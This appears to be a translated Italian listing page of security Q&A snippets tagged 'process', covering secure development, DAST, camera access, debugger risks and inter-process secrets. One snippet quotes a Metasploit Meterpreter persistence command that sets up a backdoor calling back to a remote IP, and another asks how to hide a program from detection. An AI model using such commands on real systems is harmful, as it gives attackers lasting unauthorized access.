Domande con tag 'process'

domande con tag
1
risposta

Come si integrano i processi di sviluppo software, OWASP CLASP e MS SDL e gli standard di sicurezza?

Come si integrano questi tre concetti: Il processo di sviluppo del software ( SDP ) indica le diverse fasi della creazione di un'applicazione. I processi ben noti sono cascata, spirale, agile, programmazione estrema, ecc. OWASP Clasp e Mic...
posta 07.05.2015 - 17:08
2
risposte

I risultati degli strumenti DAST (Dynamic Application Security Testing) possono essere falsi positivi?

So che i risultati di Static Application Security Testing (SAST) possono essere falsi positivi o reali e spetta all'analista e allo sviluppatore della sicurezza decidere quale vulnerabilità è reale in base allo scenario e al contesto. Lo stes...
posta 10.05.2018 - 01:07
1
risposta

Come determinare quale programma ha avuto accesso alla videocamera Mac?

La luce verde sulla fotocamera del mio portatile è stata appena accesa e poi spenta dopo 1 secondo. Sono estremamente preoccupato di questo poiché non eseguo programmi che potrebbero aver abilitato la fotocamera. Ho controllato Console.app e...
posta 31.07.2015 - 03:39
2
risposte

In che modo il collegamento a un processo con un debugger può compromettere la sicurezza del sistema?

Visual Studio mostra un avviso, cercando di collegarsi a un processo di un altro utente: Cercandounaspiegazione,hotrovato l'articolo MSDN , sostenendo che: An untrusted process that contains malicious code has the potential to damage th...
posta 21.06.2016 - 12:54
1
risposta

Un utente può reimpostare la sua password se il suo indirizzo e-mail non è ancora stato verificato?

Per favore considera uno scenario in cui un utente si iscrive a un'applicazione web con la sua email e password . Dopo la registrazione, all'utente viene inviata una email di conferma che richiede un accesso / sessione per confermare l'in...
posta 22.09.2016 - 15:02
4
risposte

Qual è il modo più sicuro per trasferire un segreto tra 2 processi in esecuzione sullo stesso sistema?

Come parte del mio sistema, ho molti processi, ognuno dei quali creato attraverso uno script. Uno dei processi può essere considerato un "processo principale" nel senso che questo processo comunica con il server e ottiene tutte le informazioni r...
posta 29.12.2017 - 12:45
1
risposta

Come posso nascondere un programma da un altro programma?

Se il programma A analizza la RAM, i processi in esecuzione e quant'altro, posso nascondere il programma B dall'essere rilevato da A? Fondamentalmente, non voglio che il programma A rilevi il programma B, o almeno lo impedisca di identificarl...
posta 03.09.2015 - 06:14
3
risposte

Proteggi il traffico TCP per la comunicazione tra processi

Ho diversi processi in esecuzione su un sistema che interagiscono tra loro tramite TCP (ad esempio con il protocollo di messaggistica asincrona di twisted). process1 <=====> broker <=====> process2 C'è un'istanza del server (bro...
posta 27.12.2016 - 14:08
1
risposta

Sviluppo degli exploit: dispositivi diversi con lo stesso sistema operativo / architettura avranno la stessa memoria di processo esatta (ad esempio indirizzi) per un dato binario?

A volte, quando sviluppo un exploit che funziona perfettamente su una determinata macchina, fallirà su uno diverso, nonostante abbia lo stesso OS / Architettura e configurazioni (come il linguaggio, che nella mia esperienza può avere alcuni effe...
posta 31.03.2018 - 01:19
1
risposta

Come funziona la persistenza di metasploit?

Quando eseguiamo il remote exploit di un target con meterpreter, possiamo usare il comando run persistence -U -i 10 -p 12345 -r 192.168.1.1 per creare un programma persistente che proverà a connettersi alla macchina quale indirizzo IP è 19...
posta 03.04.2016 - 16:41